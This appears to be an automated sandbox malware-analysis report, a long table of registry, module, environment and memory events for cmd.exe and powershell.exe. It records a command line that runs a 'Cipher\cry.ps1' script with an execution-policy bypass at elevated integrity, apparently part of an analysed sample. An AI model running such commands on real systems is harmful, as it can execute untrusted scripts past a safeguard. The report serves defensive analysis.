| Get Info | cmd.exe | type = file_attributes |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
2 | |
| Get Info | STD_OUTPUT_HANDLE | type = size |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
10 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | STD_OUTPUT_HANDLE | size = 1, size_out = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 88, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cmd.exe | os_pid = 0x98c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0x51c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x1030000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (30)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
10 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
3 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERPROFILE, result_out = C:\Users\CIiHmnxMn6Ps |
|
3 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 |
Process #6: cmd.exe
49
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | cmd.exe /c cd C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:49, Reason: Child Process |
| Unmonitor | End Time: 00:00:51, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x98c |
| Parent PID | 0xcf4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A44
0x
924
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000c50000 | 0x00c50000 | 0x00c6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c50000 | 0x00c50000 | 0x00c5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000c60000 | 0x00c60000 | 0x00c63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00c71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00c73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c80000 | 0x00c80000 | 0x00c93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000de0000 | 0x00de0000 | 0x00de3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000df0000 | 0x00df0000 | 0x00df0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e00000 | 0x00e00000 | 0x00e01fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e10000 | 0x00ecdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f30000 | 0x00f30000 | 0x00f3ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x01030000 | 0x0107ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001080000 | 0x01080000 | 0x0507ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x0517ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005220000 | 0x05220000 | 0x0531ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005430000 | 0x05430000 | 0x0543ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e600000 | 0x7e600000 | 0x7e6fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e700000 | 0x7e700000 | 0x7e722fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e725000 | 0x7e725000 | 0x7e725fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e726000 | 0x7e726000 | 0x7e726fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e72a000 | 0x7e72a000 | 0x7e72cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e72d000 | 0x7e72d000 | 0x7e72ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 232, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x1030000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher |
|
1 |
Process #7: powershell.exe
8923
0
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | powershell -ExecutionPolicy ByPass -File C:\Users\CIiHmnxMn6Ps\Documents\WindowsPowerShell\Modules\Cipher\cry.ps1 |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:00:50, Reason: Child Process |
| Unmonitor | End Time: 00:02:26, Reason: Self Terminated |
| Monitor Duration | 00:01:36 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x51c |
| Parent PID | 0xcf4 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B64
0x
B68
0x
150
0x
414
0x
264
0x
D30
0x
D8C
0x
CE4
0x
E14
0x
DE8
0x
DF4
0x
DD8
0x
DC0
0x
888
0x
910
0x
384
0x
378
0x
AD4
0x
248
0x
C50
0x
C90
0x
408
0x
784
0x
F84
0x
F60
0x
FDC
0x
FF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| powershell.exe | 0x00040000 | 0x000b4fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x041affff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00000000041b0000 | 0x041b0000 | 0x041cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000041b0000 | 0x041b0000 | 0x041bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000041c0000 | 0x041c0000 | 0x041c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000041d0000 | 0x041d0000 | 0x041d1fff | Private Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x041d0000 | 0x041d2fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000041e0000 | 0x041e0000 | 0x041f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004200000 | 0x04200000 | 0x0423ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004240000 | 0x04240000 | 0x0427ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004280000 | 0x04280000 | 0x04283fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004290000 | 0x04290000 | 0x04290fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000042a0000 | 0x042a0000 | 0x042a1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042b0000 | 0x042b0000 | 0x042b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000042c0000 | 0x042c0000 | 0x043bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043c0000 | 0x043c0000 | 0x043cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x043d0000 | 0x0448dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004490000 | 0x04490000 | 0x044cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044d0000 | 0x044d0000 | 0x0450ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004510000 | 0x04510000 | 0x0454ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004550000 | 0x04550000 | 0x0458ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004590000 | 0x04590000 | 0x04717fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004720000 | 0x04720000 | 0x04720fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004730000 | 0x04730000 | 0x04730fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004740000 | 0x04740000 | 0x04740fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004750000 | 0x04750000 | 0x0475ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004760000 | 0x04760000 | 0x048e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000048f0000 | 0x048f0000 | 0x05ceffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005cf0000 | 0x05cf0000 | 0x05cf0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.1.db | 0x05d00000 | 0x05d03fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x05d00000 | 0x05d03fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x05d10000 | 0x05d22fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000005d30000 | 0x05d30000 | 0x05d30fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000005d40000 | 0x05d40000 | 0x05d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005d80000 | 0x05d80000 | 0x05dbffff | Private Memory | rw |
|
|
|
- |
| {3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000003b.db | 0x05dc0000 | 0x05ddbfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005dc0000 | 0x05dc0000 | 0x05dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005e00000 | 0x05e00000 | 0x05e3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005e40000 | 0x05e40000 | 0x05e7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005e80000 | 0x05e80000 | 0x05ebffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005ec0000 | 0x05ec0000 | 0x05ecffff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x05ed0000 | 0x05ed3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005ee0000 | 0x05ee0000 | 0x05eeffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05ef0000 | 0x06226fff | Memory Mapped File | r |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db | 0x06230000 | 0x06272fff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db | 0x06280000 | 0x0630afff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000006310000 | 0x06310000 | 0x06313fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000006320000 | 0x06320000 | 0x0632ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000006330000 | 0x06330000 | 0x0633ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006340000 | 0x06340000 | 0x0634ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006350000 | 0x06350000 | 0x0635ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006360000 | 0x06360000 | 0x0636ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006370000 | 0x06370000 | 0x0637ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000006380000 | 0x06380000 | 0x06380fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006390000 | 0x06390000 | 0x06390fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000063a0000 | 0x063a0000 | 0x063dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000063e0000 | 0x063e0000 | 0x063fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006400000 | 0x06400000 | 0x0640ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006410000 | 0x06410000 | 0x0644ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006450000 | 0x06450000 | 0x0648ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000006490000 | 0x06490000 | 0x0649ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000064a0000 | 0x064a0000 | 0x064affff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000064b0000 | 0x064b0000 | 0x084affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000084b0000 | 0x084b0000 | 0x084effff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x084f0000 | 0x08551fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll | 0x08560000 | 0x08564fff | Memory Mapped File | r |
|
|
|
- |
| winnlsres.dll.mui | 0x08570000 | 0x0857ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000008580000 | 0x08580000 | 0x0858ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000008590000 | 0x08590000 | 0x0859ffff | Private Memory | - |
|
|
|
- |
| private_0x00000000085a0000 | 0x085a0000 | 0x085affff | Private Memory | rw |
|
|
|
- |
| system.numerics.dll | 0x085b0000 | 0x085d1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000085e0000 | 0x085e0000 | 0x085effff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000085f0000 | 0x085f0000 | 0x086effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000086f0000 | 0x086f0000 | 0x086fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000008700000 | 0x08700000 | 0x0870ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000008710000 | 0x08710000 | 0x0871ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000008720000 | 0x08720000 | 0x0872ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000008730000 | 0x08730000 | 0x0873ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000008740000 | 0x08740000 | 0x0874ffff | Private Memory | - |
|
|
|
- |
| cry.ps1 | 0x09aa0000 | 0x09aa0fff | Memory Mapped File | r |
|
|
|
|
| cipher.psm1 | 0x0a0f0000 | 0x0a0f1fff | Memory Mapped File | r |
|
|
|
|
| cipher.psm1 | 0x0a500000 | 0x0a501fff | Memory Mapped File | r |
|
|
|
|
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| clrjit.dll | 0x6fdd0000 | 0x6fe4cfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x6fe50000 | 0x7163efff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x71640000 | 0x716cafff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x716d0000 | 0x71de2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x71df0000 | 0x7279cfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x727a0000 | 0x739cafff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr120_clr0400.dll | 0x739d0000 | 0x73ac4fff | Memory Mapped File | rwx |
|
|
|
- |
| clr.dll | 0x73ad0000 | 0x74177fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74180000 | 0x74187fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x74190000 | 0x74207fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x74210000 | 0x74237fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x74240000 | 0x7424efff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x74250000 | 0x7426bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x74270000 | 0x74336fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x74340000 | 0x7436efff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x74370000 | 0x7438afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x74390000 | 0x743a2fff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x743b0000 | 0x743bafff | Memory Mapped File | rwx |
|
|
|
- |
| bcp47langs.dll | 0x743c0000 | 0x74410fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74420000 | 0x74561fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x74570000 | 0x74588fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x74590000 | 0x745e8fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x745f0000 | 0x74607fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74630000 | 0x746a4fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x74d90000 | 0x74d95fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76fe0000 | 0x77061fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77080000 | 0x770b5fff | Memory Mapped File | rwx |
